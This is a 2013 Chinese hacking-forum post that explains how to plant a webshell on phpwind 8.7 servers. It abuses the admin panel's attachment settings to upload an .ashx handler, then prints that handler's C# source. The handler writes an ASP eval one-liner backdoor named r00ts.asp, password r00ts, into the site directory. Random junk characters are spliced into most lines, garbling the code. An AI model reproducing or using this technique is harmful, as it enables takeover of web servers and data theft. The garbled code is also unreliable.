找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1973|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小% C" a, P5 |& A2 M0 [1 x! R, y

2 @6 t) \7 L% J9 f9 P. d群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx6 K( n3 M0 I7 R+ ~$ B4 f
1 W, A* j7 ]7 n4 w% G" h  U
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整6 l5 ?: t8 R8 x/ [. H* n

0 T* N, m& Z+ _8 H$ s' e然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
! U; n9 E, |# K
; w  Q1 v! ?+ R* ?/ M" o打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
- j- U( R3 d8 \  q: f
$ B6 V% x3 b6 {3 o$ b. k下面是代码:: n+ U4 s3 x, x
( P7 J! z/ \5 T6 x! y! C
<%@ WebHandler Language="C#"Class="Handler" %>2 M4 a% [" A$ T9 L0 J/ Q
using System;
" T. s. E1 o* f/ K6 o# Uusing System.Web;
% O: l( o4 K5 R, M6 B8 {using System.IO;/ f- K" f5 v# a0 _  z0 ^) |
public class Handler : IHttpHandler {
: R' H0 D! b# I. [) x1 v9 V! @public void ProcessRequest (HttpContext context) {
% M  k/ E: O5 p, U7 D3 P8 u5 P6 ]context.Response.ContentType = "text/plain";
+ u" G1 E" H, H! W8 c, T  o3 EStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
1 I% e2 e% X2 L  i5 Ufile1.Write("<%eval request(\"r00ts\")%>");
) Z9 s2 P! E$ i- rfile1.Flush();
# x* l7 w" f, |3 C. Z9 \file1.Close();0 v) v6 d) t' p
}
: H8 @9 Y, O! C2 F# d# Dpublic bool IsReusable {
6 t; n6 I) f8 A6 aget {
$ c6 V0 [& R! _7 m% b5 f/ Yreturn false;+ d5 T' u( Z: ?
}3 e* m1 A7 ]' U  x
}
3 u  S6 v9 {; F6 B* t7 B) T}( z3 n6 I' N7 Z! r/ ~0 \4 j  H$ [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表